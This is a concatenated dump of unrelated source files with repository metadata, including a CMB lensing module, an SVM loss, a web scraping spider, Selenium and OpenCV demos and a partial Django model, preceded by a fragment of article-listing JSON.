"student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": 
"https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6941172390973931557, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6999988010993319949", "article_info": {"article_id": "6999988010993319949", "user_id": "3025489497950094", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/256c911e6f4e4415afdbbe078d3e5c5b~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「前端刷题」23. 合并K个升序链表", "brief_content": "给你一个链表数组,每个链表都已经按升序排列。 请你将所有链表合并到一个升序链表中,返回合并后的链表。 示例 1: 输入: lis", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1629811803", "mtime": "1629860490", "rtime": "1629860490", "draft_id": "6999986695672184839", "view_count": 42, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 2, "is_hot": 0, "rank_index": 0.00061825, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3025489497950094", "user_name": "明无生", "company": "武林", "job_title": "侠客", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/2d4deb94951dc1809fbb962839fc092f~300x300.image", "level": 1, "description": "无怨无悔我走我路,走不尽天涯路。", "followee_count": 0, "follower_count": 0, "post_article_count": 31, "digg_article_count": 2, "got_digg_count": 12, "got_view_count": 1807, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, 
"power": 30, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6999988010993319949, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}], "cursor": "eyJ2IjoiNzAwNzYyNzUzMTk4MTQyMjYyOCIsImkiOjI0MH0=", "count": 552, "has_more": true} | [
"www.1759633997@qq.com"
] | www.1759633997@qq.com |
952babd550cd9afcf85f784233a0982659630df6 | fed5cff094e3bb65b7963c26f96420469f6a60ac | /lensing.py | b9163dcb909a4e8cc116c5654ade26d019a7a5a0 | [] | no_license | sriniraghunathan/cmb_lensing | fbafbd939123345a77c17a51c3d4edd950b046a2 | 8a6250a910ea2687d99646d9ce6d242389d9f6eb | refs/heads/master | 2023-03-29T05:35:13.225785 | 2021-03-24T14:16:37 | 2021-03-24T14:16:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,567 | py | # importing relevant modules
import numpy as np
import scipy as sp
from cosmo import CosmoCalc
import tools
#################################################################################################################################
# defining relevant constants
c = 3e8 # speed of light in m/s
G = 4.3*10**(-9) # gravitational constant in Mpc*M_sun^-1*(km/s)^2
#################################################################################################################################
def lensing_distances(zl, zs):
    """Return the three angular diameter distances of a lens/source pair.

    Parameters
    ----------
    zl, zs : float
        Lens and source redshifts.

    Returns
    -------
    tuple of float
        (D_l, D_s, D_ls): observer-to-lens, observer-to-source and
        lens-to-source angular diameter distances, all in Mpc.
    """
    dist_lens = CosmoCalc().angular_diameter_distance(0, zl)
    dist_source = CosmoCalc().angular_diameter_distance(0, zs)
    dist_lens_source = CosmoCalc().angular_diameter_distance(zl, zs)
    return dist_lens, dist_source, dist_lens_source
def critical_surface_mass_density(zl, zs):
    """Critical surface mass density Sigma_c of the lens/source system.

    Uses Sigma_c = c^2 / (4 pi G) * D_s / (D_l * D_ls); the speed of
    light is converted from m/s to km/s to match the units of G.
    Result is in M_sun / Mpc^2.
    """
    d_l, d_s, d_ls = lensing_distances(zl, zs)
    prefactor = ((c * 1e-3) ** 2) / (4 * np.pi * G)
    return prefactor * (d_s / (d_l * d_ls))
def deflection_from_convergence(mapparams, kappa_map):
    """Compute the lensing deflection field alpha from a convergence map.

    Works in Fourier space: alpha(l) = 2i * l * kappa(l) / |l|^2 for each
    component. Returns [alphaX, alphaY] in arcmin.
    """
    # defining underlying grid in harmonic space
    grid, _ = tools.make_grid(mapparams, harmonic = True)
    lX, lY = grid
    l2d = np.hypot(lX, lY)
    # computing deflection angle from convergence map
    kappa_map_fft = np.fft.fft2(kappa_map)
    # division by l2d**2 is 0/0 at the zero-frequency mode (if present);
    # the resulting NaNs are zeroed just below, which sets the monopole to 0
    alphaX_fft = 1j * lX * 2. * kappa_map_fft / l2d**2
    alphaY_fft = 1j * lY * 2. * kappa_map_fft / l2d**2
    alphaX_fft[np.isnan(alphaX_fft)] = 0
    alphaY_fft[np.isnan(alphaY_fft)] = 0
    # back to real space; radians -> degrees -> arcmin
    alphaX = np.degrees(np.fft.ifft2(alphaX_fft).real)*60
    alphaY = np.degrees(np.fft.ifft2(alphaY_fft).real)*60
    alpha_vec = [alphaX, alphaY]
    return alpha_vec # in arcmin
def lens_map(map_params, unlensed_map, alpha_vec):
    """Apply a deflection field to an unlensed map via remapping.

    The lensed map at position beta is the unlensed map evaluated at
    theta = beta + alpha, obtained through bivariate spline interpolation.
    """
    # creating undeflected field
    grid, _ = tools.make_grid(map_params)
    betaX, betaY = grid
    # cromputing deflected field
    alphaX, alphaY = alpha_vec
    thetaX = betaX + alphaX
    thetaY = betaY + alphaY
    # computing lensed map through interpolation (5th-order spline in both axes)
    interpolate = sp.interpolate.RectBivariateSpline(betaY[:,0], betaX[0,:], unlensed_map, kx = 5, ky = 5)
    lensed_map = interpolate.ev(thetaY.flatten(), thetaX.flatten()).reshape([len(betaY), len(betaX)])
    return lensed_map
#################################################################################################################################
class NFW:
    """Navarro-Frenk-White halo lens model.

    Parameterized by mass M_200, concentration c_200, lens redshift z_l
    and source redshift z_s. Provides the analytic convergence profile
    and a 2D convergence map.
    """
    def __init__(self, M_200, c_200, z_l, z_s):
        self.M_200 = M_200
        self.c_200 = c_200
        self.z_l = z_l
        self.z_s = z_s
    def convergence_profile(self, theta):
        """Return kappa(theta) for angular radii theta given in arcmin."""
        # computing cosmological parameters
        Dl, _, _ = lensing_distances(self.z_l, self.z_s)
        rho_c = CosmoCalc().critical_density(self.z_l)
        # computing nfw parameters (r_200 from the 200*rho_c overdensity definition)
        r_200 = ((3*self.M_200)/(4*np.pi*200*rho_c))**(1/3)
        r_s = r_200/self.c_200
        rho_s = (200 / 3) * rho_c * (self.c_200 ** 3 / (np.log(1 + self.c_200) - (self.c_200 / (1 + self.c_200))))
        # computing x = theta / theta_s (dimensionless radius)
        theta_rad = np.radians(theta/60)
        theta_s = r_s/Dl
        x = theta_rad/theta_s
        # computing kappa_s
        sigma_c = critical_surface_mass_density(self.z_l, self.z_s)
        kappa_s = rho_s*r_s/sigma_c
        # computing f (piecewise auxiliary function of the Wright & Brainerd form)
        x1 = np.where(x > 1)
        x2 = np.where(x == 1)
        x3 = np.where(x < 1)
        f = np.zeros(len(x))
        f[x1] = (1/np.sqrt(x[x1]**2-1))*np.arctan(np.sqrt(x[x1]**2-1))
        f[x2] = 1
        f[x3] = (1/np.sqrt(1-x[x3]**2))*np.arctanh(np.sqrt(1-x[x3]**2))
        # computing kappa
        # NOTE(review): at x == 1 this is 0/0 and yields NaN (the analytic
        # limit is 2*kappa_s/3); likewise x == 0 produces a division issue
        # — confirm whether callers ever hit these exact radii.
        kappa_profile = (2*kappa_s*(1-f)/(x**2-1))
        return kappa_profile
    def convergence_map(self, map_params, centroid_shift = None):
        """Build a 2D convergence map; optional (x, y) centroid shift in map units."""
        # getting kappa_profile sampled on radii out to half the map width
        nx, dx, _, _ = map_params
        theta = np.linspace(0, nx*dx/2, nx)
        kappa_profile = self.convergence_profile(theta)
        # creating map grid
        grid, _ = tools.make_grid(map_params)
        # adding Gaussian positional uncertainties
        gridX, gridY = grid
        if centroid_shift is not None:
            x_shift, y_shift = centroid_shift
            gridX += x_shift
            gridY += y_shift
            grid = gridX, gridY
        # computing convergence map from convergence profile (radial -> 2D)
        kappa_map = tools.convert_to_2d(grid, theta, kappa_profile)
        return kappa_map
"noreply@github.com"
] | noreply@github.com |
c03a0a16cd18a1dc84fbaa0069aa6edc636399b0 | 1f6c1b65ac3f71ccc16b46585595406dfbbc1ca1 | /shared/clock.py | 25626ea5176e1d9b9fc34c3ca7369b6891eb6efa | [] | no_license | luisoibarra/distscrappy | 20d236786c7009e2db1db758e91dac62dd49a963 | ba2db15543f9811f7985b9d77178019308fb3807 | refs/heads/master | 2023-05-31T20:08:07.841953 | 2021-06-22T02:43:41 | 2021-06-22T02:43:41 | 375,577,901 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | import time
import Pyro4
@Pyro4.expose
class ClockMixin:
    """
    Mixin that provides clock time methods.

    Stores a single float offset (``_clock_time_diff``) between an external
    reference clock and the local ``time.time()``, so ``getClockTime`` can
    report the reference time without further synchronization.

    Bug fix: the lazy-init guards previously tested
    ``hasattr(self, "__clock_time_diff")`` — an attribute name that is never
    assigned (the stored attribute is ``_clock_time_diff``). The check was
    therefore always False, so ``getClockTime`` re-ran ``initClockTime`` on
    every call and silently reset the offset set by ``setClockTime``.
    """
    def initClockTime(self):
        # No offset yet: behave as the local clock.
        self._clock_time_diff = 0
    def setClockTime(self, t: float):
        """Record reference time ``t`` (seconds since epoch) as the new offset."""
        if not hasattr(self, "_clock_time_diff"):
            self.initClockTime()
        self._clock_time_diff = t - time.time()
    def getClockTime(self):
        """Return the current reference-clock time (local time plus offset)."""
        if not hasattr(self, "_clock_time_diff"):
            self.initClockTime()
        return self._clock_time_diff + time.time()
| [
"lukedalmau@gmail.com"
] | lukedalmau@gmail.com |
dca9033b946ba0da1b82f6962d81894435c4265a | 33ca1dab3b0d4e25bdf114e0b873fcb0fdcbc01e | /Input_Output/Using_Pickel_read_write_bin/__init__.py | 8b8e57d9d58a5d7c511f17e61f5c12d8fcb6ba9a | [] | no_license | Biddy79/eclipse_python | 4f49fd714cbdb09be014e75b74a983e456a94b93 | b90c491834d0a584bcab0b99bb8f26d9c0d26669 | refs/heads/master | 2021-12-08T21:55:44.438923 | 2021-11-01T14:39:18 | 2021-11-01T14:39:18 | 235,864,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,556 | py | #import pickle lib
import pickle
# Demo script: serialize a nested tuple to "computer.bin", then read it back,
# append further objects, and read everything again in the same order.
# creating a tuple to write to bin_file
computer = ('CPU RAM HARD DRIVE MOTHERBOARD',
            (('cpu', 'AMD Ryzen 9'), ('ram', 'Corsair 32gb'),
             ('hard drive', 'Samsung 1td ssd'), ('motherboard', 'ASUS ROG STRIX')))
computer_parts, computer_spec = computer
# using pickle.dump() to save the computer tuple as a bin file
# with open("computer.bin", 'wb') as pickle_file:
#     #parameter tuple file variable
#     pickle.dump(computer, pickle_file)
#### code above commented out as the file has now been created, so no need to create it again ############
# using pickle.load() to read computer.bin back into Python objects
with open("computer.bin", 'rb') as computer_pickled:
    computer = pickle.load(computer_pickled)
#print(computer)
# unpacking the computer tuple that has now been read with pickle.load()
computer_description, computer_parts = computer
# printing out the unpacked tuple
print(computer_description)
for parts in computer_parts:
    description, part = parts
    print(description, part)
print("-" * 30)
# variables created to add to the computer.bin file
stock_left = [12, "Manchester", 10, "Sheffield", 2, "Newcastle"]
# using dump to now add the stock_left list to computer.bin
# pickle.dump() parameters: item to be saved, file object, and (optional) protocol
with open("computer.bin", 'wb') as pickle_file:
    pickle.dump(computer, pickle_file)
    pickle.dump(stock_left, pickle_file)
    # we can also just add a computed variable here
    total_stock = stock_left[0] + stock_left[2] + stock_left[4]
    pickle.dump(total_stock, pickle_file)
# now reading computer.bin after the dump of the new items;
# items must be loaded in the same order they were dump()ed into the file
with open("computer.bin", 'rb') as computer_pickled:
    computer = pickle.load(computer_pickled)
    stock_and_area = pickle.load(computer_pickled)
    total_stock = pickle.load(computer_pickled)
# unpacking tuple
computer_description, computer_parts = computer
# printing out tuple
print(computer_description)
for parts in computer_parts:
    description, part = parts
    print(description, part)
# printing out the stock list that was appended with dump() above
print(stock_and_area)
# printing out the computed total that was appended after it
print(total_stock)
# note: newer pickle protocols are not backwards compatible, and there are safety
# concerns when loading pickled files from unknown sources (arbitrary code execution)
"a.beardsley79@gmail.com"
] | a.beardsley79@gmail.com |
c062491db89b6d205ed3010f8b3bee07231d1981 | 9c00aca19e4faea5067769c06f4430b41b8ad00d | /assignment1/cs231n/classifiers/linear_svm.py | e33b1903347f6ba255a8bf29f0f0b4e1e9fb2e41 | [] | no_license | amir-raffiee/cs-231n | 5a2e40ba9ea31cc76e352fe6e70c0e031f9555f6 | 3a80042ddfa5e05e5ba168841d77cf7a1fe29d1c | refs/heads/master | 2021-09-01T16:53:52.507865 | 2017-12-28T01:04:52 | 2017-12-28T01:04:52 | 115,569,727 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,390 | py | import numpy as np
from random import shuffle
from past.builtins import xrange
def svm_loss_naive(W, X, y, reg):
    """
    Structured SVM loss function, naive implementation (with loops).

    Inputs have dimension D, there are C classes, and we operate on minibatches
    of N examples.

    Inputs:
    - W: A numpy array of shape (D, C) containing weights.
    - X: A numpy array of shape (N, D) containing a minibatch of data.
    - y: A numpy array of shape (N,) containing training labels; y[i] = c means
      that X[i] has label c, where 0 <= c < C.
    - reg: (float) regularization strength

    Returns a tuple of:
    - loss as single float
    - gradient with respect to weights W; an array of same shape as W
    """
    dW = np.zeros(W.shape)  # initialize the gradient as zero

    # Compute the loss and the gradient together, one training example at a
    # time. (Uses the built-in range instead of past.builtins.xrange — the
    # iteration semantics are identical and the Python-2 shim is not needed.)
    num_classes = W.shape[1]
    num_train = X.shape[0]
    loss = 0.0
    for i in range(num_train):
        scores = X[i].dot(W)
        correct_class_score = scores[y[i]]
        for j in range(num_classes):
            if j == y[i]:
                continue
            margin = scores[j] - correct_class_score + 1  # note delta = 1
            if margin > 0:
                # Hinge is active: accumulate loss and the gradient
                # contribution for the violating class and the correct class.
                loss += margin
                dW[:, j] += np.transpose(X[i])
                dW[:, y[i]] -= np.transpose(X[i])

    # Right now the loss is a sum over all training examples, but we want it
    # to be an average instead so we divide by num_train.
    loss /= num_train
    dW /= num_train

    # Add L2 regularization to the loss and its derivative to the gradient.
    loss += reg * np.sum(W * W)
    dW += 2. * reg * W
    return loss, dW
def svm_loss_vectorized(W, X, y, reg):
    """
    Structured SVM loss function, vectorized implementation.

    Inputs and outputs are the same as svm_loss_naive: weights W (D, C),
    data X (N, D), labels y (N,), and regularization strength reg.
    Returns (loss, dW).
    """
    num_train = X.shape[0]
    rows = np.arange(num_train)

    # Scores and margins relative to each sample's correct-class score.
    scores = X.dot(W)
    correct = scores[rows, y]
    margins = scores - correct.reshape(-1, 1) + 1.0

    # Hinge loss: every correct class contributes exactly max(0, 0 + 1) = 1,
    # so subtracting num_train removes those spurious terms in one step.
    loss = np.sum(np.maximum(0.0, margins)) - num_train
    loss = loss / num_train + reg * np.sum(W * W)

    # Gradient: indicator matrix of active (positive) margins; the correct
    # class column receives minus the number of violating classes per row.
    active = (margins > 0.0) * np.ones(margins.shape)
    active[rows, y] = -(np.sum(active, axis=1) - 1.0)
    dW = np.transpose(X).dot(active)
    dW = dW / num_train + 2. * reg * W

    return loss, dW
| [
"noreply@github.com"
] | noreply@github.com |
f879b55baf04f46a20421bff6c616a80bc6116d5 | 0e4c5acb80ea44bfa33a0afb713c0d4bc3a5c8f7 | /xueshu/spiders/xueshu.bak | 7437bcaea15ac5f8c894e8b670a53f200f9a237a | [] | no_license | ljjwyn/xueshu | f9ee58602de25244e85f32948020a511c91b4b86 | 69ccc98b1d4fcef2275a8cef939034f2a3d1e5a8 | refs/heads/master | 2023-01-31T02:53:25.515136 | 2020-12-18T05:40:13 | 2020-12-18T05:40:13 | 322,499,259 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,532 | bak | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from scrapy.spiders import CrawlSpider, Rule
from scrapy_splash import SplashRequest
from scrapy.linkextractors import LinkExtractor
from scrapy_splash import SplashTextResponse, SplashJsonResponse, SplashResponse
from scrapy.http import HtmlResponse
from xueshu.items import XueshuItem
class MySpider(CrawlSpider):
    """Crawl Baidu Xueshu paper pages through Splash (JS rendering) and
    extract article metadata into XueshuItem objects."""
    name = 'baiduxueshu'
    # Seed paper page(s) to start crawling from.
    url = ['http://xueshu.baidu.com/usercenter/paper/show?paperid=5b9f2c599a5a150fbf8e94a72e18edae']
    def start_requests(self):
        for url in self.url:
            # Splash defaults to the render.html endpoint, which returns the
            # HTML of the page after JavaScript has been executed.
            yield SplashRequest(url, args={'wait': 10})
    rules = (
        Rule(LinkExtractor(restrict_xpaths='//div[@class="con_related"]//li//p[@class="rel_title"]',tags='a',attrs='href'), process_request='splash_request', follow=True),
    )
    # This method is referenced by name in the Rule's process_request above.
    def splash_request(self, request):
        """
        process_request is a callable, or a string (in which case a method from the spider object with that name will
        be used) which will be called with every request extracted by this rule,
        and must return a request or None (to filter out the request).
        :param request:
        :return: SplashRequest
        """
        return SplashRequest(url=request.url, args={'wait': 1})
    # Override of a CrawlSpider method.
    def _requests_to_follow(self, response):
        """
        Splash can return any of SplashTextResponse, SplashJsonResponse or
        SplashResponse, in addition to scrapy's default HtmlResponse; so the
        type check below accepts all of them (extending the types checked by
        the upstream implementation).
        :param response:
        :return:
        """
        # print(type(response)) # <class 'scrapy_splash.response.SplashTextResponse'>
        if not isinstance(response, (SplashTextResponse, SplashJsonResponse, SplashResponse, HtmlResponse)):
            return
        print('==========================动态解析url=========================')
        # Extract the article fields from the rendered page.
        item = XueshuItem()
        item['title'] = response.css('.main-info h3 a::text').extract_first()
        item['author'] = response.css('.author_text span a::text').extract()
        item['abstract'] = response.css('.abstract::text').extract_first()
        item['keyWords'] = response.css('.kw_main span a::text').extract()
        item['DOI'] = response.css('.doi_wr .kw_main::text').extract_first()
        item['cited'] = response.css('.sc_cite_cont::text').extract_first()
        yield item
        # Follow the links extracted by each rule, de-duplicated via `seen`.
        seen = set()
        for n, rule in enumerate(self._rules):
            links = [lnk for lnk in rule.link_extractor.extract_links(response)
                     if lnk not in seen]
            if links and rule.process_links:
                links = rule.process_links(links)
            for link in links:
                seen.add(link)
                r = self._build_request(n, link)
                yield rule.process_request(r)
    def _build_request(self, rule, link):
        # Important: this overrides the parent method. The request MUST carry
        # meta={'rule': rule, 'link_text': link.text} — see the CrawlSpider
        # source for why this metadata is required downstream.
        r = SplashRequest(url=link.url, callback=self._response_downloaded, meta={'rule': rule, 'link_text': link.text},
                          args={'wait': 5, 'url': link.url, 'lua_source': ''})
        r.meta.update(rule=rule, link_text=link.text)
        return r
| [
"15964969802@163.com"
] | 15964969802@163.com |
d02b3ee42165fc8a4ec861da700bab61c57b5750 | 0d448a977b0e30b4d5dac76c8f273efb069e263c | /face_blur/face_bluring.py | 0d8da9adf20cad98adfb541936fc19ba2b9ec2f7 | [] | no_license | Prakadeeswaran05/Mini-Projects | cccecc5f559e4315b2d81ad83e67b44f9f12e733 | 984050cea9b8526e8dd38d76f695dca1503ecb3f | refs/heads/master | 2023-06-05T13:03:12.131637 | 2021-06-19T08:58:44 | 2021-06-19T08:58:44 | 298,242,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | import cv2
# Webcam face-blurring demo: detect faces with a Haar cascade and blur each
# detected region with a Gaussian kernel, frame by frame, until ESC is pressed.
face_cascade=cv2.CascadeClassifier('C:\\Users\\kesav\\Downloads\\face_blur\\haarcascade_frontalface_default.xml')
cap=cv2.VideoCapture(0)  # default webcam
while True:
    ret,frame=cap.read(0)
    face_img=frame.copy()
    # Detect faces as (x, y, w, h) rectangles.
    face_rects=face_cascade.detectMultiScale(face_img)
    for (x,y,w,h) in face_rects:
        img=face_img[y:y+h, x:x+w]
        # Blur the face region in place (51x51 kernel, auto sigma).
        img= cv2.GaussianBlur(img, (51,51), 0)
        face_img[y:y+h,x:x+w]=img
    cv2.imshow('blurred face',face_img)
    #cv2.imshow('blur',img)
    k=cv2.waitKey(1)
    # 27 is the ESC key code — exit on ESC.
    if k==27:
        break
cap.release()
cv2.destroyAllWindows()
| [
"prakugenius@gmail.com"
] | prakugenius@gmail.com |
893ef9476b1476a4529208a0c1475e6749d452e7 | 6d1728bf105a7d6481d0bbca2b88f4478e0632d9 | /beautifulsoup/start/sibling.py | e0e1b3167becdb2101cb9e5f656394b366a1fa76 | [] | no_license | Phantomn/Python | 00c63aceb2d4aa0db71fe5e33fe8b5159b41aadd | 12808adf4b52c60cfe94befb6daa1e8187224beb | refs/heads/Python | 2022-11-09T16:49:49.165884 | 2019-08-05T07:30:07 | 2019-08-05T07:30:07 | 44,149,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | from urllib import urlopen
from bs4 import BeautifulSoup
# Fetch the sample scraping page and print every sibling row that follows the
# first <tr> of the gift-list table (i.e. all data rows after the header).
html = urlopen("http://www.pythonscraping.com/pages/page3.html")
bsObj = BeautifulSoup(html, "html.parser")
for sibling in bsObj.find("table", {"id":"giftList"}).tr.next_siblings:
    print(sibling)
"tmdvyr123@naver.com"
] | tmdvyr123@naver.com |
52e390b76a17c761f1aefd5adfe00b9b3859f38b | c730ce0eeea6d774ac6bf7b8ae28d7201efbaa12 | /MovieRaterApi/movierater/urls.py | 98444c67e42b240cef788dec464c2ea0739c7263 | [] | no_license | Yi-Lai-SJSU/Django-React-project-Movie-rator | 4057a81550e34e1f72f62eb18e13542c97f7e969 | d9b97c74948f8ccc47b1eb0e924ba1147da34174 | refs/heads/master | 2020-12-13T10:24:33.137183 | 2020-01-18T07:00:26 | 2020-01-18T07:00:26 | 234,388,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | """movierater URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf.urls import include
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
    path('admin/', admin.site.urls),          # Django admin site
    path('api/', include('api.urls')),        # application API routes
    path('auth/', obtain_auth_token),         # DRF token authentication endpoint
]
| [
"yugguo@adobe.com"
] | yugguo@adobe.com |
6f71f8c2009acaee5f18bf0ff7b498764b45a894 | 922d4d17e73120e5075d95385b5d930adedf4ba4 | /fileupload.py | 1759017fea234674c0e7bea021ffab3e944f2a87 | [] | no_license | Animesh66/SeleniumTutorial | 31adf60b5ff4d54a49071fcdd12d88f67aa79aeb | fe61fc9fff4d46a6951919d51d81b048451c2e3d | refs/heads/master | 2023-05-09T21:43:51.689598 | 2021-05-28T17:10:51 | 2021-05-28T17:10:51 | 369,188,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | from selenium import webdriver
import time
# Selenium demo: open the practice page and upload a local image through the
# embedded form's file-input field.
# NOTE(review): driver.switch_to_frame and find_element_by_id are deprecated
# Selenium APIs (replaced by driver.switch_to.frame and
# find_element(By.ID, ...)) — confirm the installed Selenium version still
# supports them before modernizing.
driver = webdriver.Chrome()
driver.maximize_window()
driver.get("https://testautomationpractice.blogspot.com/")
driver.set_page_load_timeout(10)
driver.switch_to_frame(0) # switch to the first iframe to reach the form
upload_file = driver.find_element_by_id("RESULT_FileUpload-10") # locate the upload file input
file_path = "/Users/animeshmukherjee/Downloads/Dexter.jpeg" # local file to upload
upload_file.send_keys(file_path) # sending the path to a file input performs the upload
| [
"er.animesh6@hotmail.com"
] | er.animesh6@hotmail.com |
d54b95cb3abb42444dba3471fb97d13b45c2bc5f | fe628361e4b4b6acaf693cc9bdde3d25c1926dec | /ers_backend/dataset_manager/models.py | 2e6484d585ae2d3de686bf9de526691ec7c25359 | [
"MIT"
] | permissive | dumoulinj/ers | bcd0de8df8f63e12f7659d5ea1efe32e272e8d66 | ce38ba8acf8fed8dbf27fb85fa6c024540763286 | refs/heads/master | 2020-12-26T03:10:30.550545 | 2016-07-26T07:49:56 | 2016-07-26T07:49:56 | 35,938,084 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 29,490 | py | import os
import logging
import collections
import shutil
from PIL import Image, ImageStat
from converter.ffmpeg import FFMpeg
import cv2
from cv2 import cv
from django.db import models
from swampdragon.models import SelfPublishModel
from django_enumfield import enum
from jsonfield.fields import JSONField
from django.conf import settings
from arousal_modeler.models import Arousal
from audio_processor.models import OpensmileExtractor
from dataset_manager.dragon_serializers import VideoSerializer, DatasetSerializer
from dataset_manager.enums import FeatureType, ComputingStateType, EmotionType, FeatureFunctionType
from ers_backend.utils import is_video, convert_video_2_mp4, convert_video_2_webm, extract_wav_from_video, \
mkdir_if_not_exists, is_emotion_dir, replace_right
from video_processor.enums import ShotBoundariesDetectionAlgorithmType
from video_processor.models import ShotsDetection, ECR, ColorHistograms
logger = logging.getLogger(__name__)
#-----------------------------------------------------------------------------------------------------------------------
# Dataset
#-----------------------------------------------------------------------------------------------------------------------
class Dataset(SelfPublishModel, models.Model):
    """
    Model representing a dataset. It contains a list of multimedia elements.
    The prepare() method is used to create the directory structure, list the videos, and create the database entries.

    Pipeline stages (each with a *_state field tracking progress):
    prepare -> scan_video_folder -> prepare_videos -> detect_shot_boundaries
    -> extract_features -> model_arousal. Each stage saves the model
    repeatedly so connected clients (via SwampDragon) see live progress.
    """
    serializer_class = DatasetSerializer
    name = models.CharField(max_length=50, unique=True)
    description = models.TextField(default="Dataset description...")
    # Monitoring: per-stage computing state plus per-video progress counters.
    preparation_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    scan_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    videos_preparation_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    videos_preparation_nb_videos_done = models.IntegerField(default=0)
    shot_boundaries_detection_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    shot_boundaries_detection_nb_videos_done = models.IntegerField(default=0)
    feature_extraction_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    feature_extraction_nb_videos_done = models.IntegerField(default=0)
    arousal_modeling_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    arousal_modeling_nb_videos_done = models.IntegerField(default=0)
    # NOTE(review): default=[] is a shared mutable default — Django convention
    # is default=list; confirm JSONField handles this safely here.
    available_features = JSONField(default=[], blank=True)
    # Properties: filesystem layout rooted at DATASET_DEFAULT_PATH/<name>.
    def _base_path(self):
        return os.path.join(settings.DATASET_DEFAULT_PATH, self.name)
    base_path = property(_base_path)
    def _video_path(self):
        # Original (unconverted) video files.
        return os.path.join(self.base_path, "video")
    video_path = property(_video_path)
    def _converted_video_path(self):
        return os.path.join(self.base_path, "converted")
    converted_video_path = property(_converted_video_path)
    def _web_video_path(self):
        # Path template from settings with the dataset id substituted in.
        return settings.WEBCLIENT_VIDEOS_PATH.replace("$datasetId$", str(self.id))
    web_video_path = property(_web_video_path)
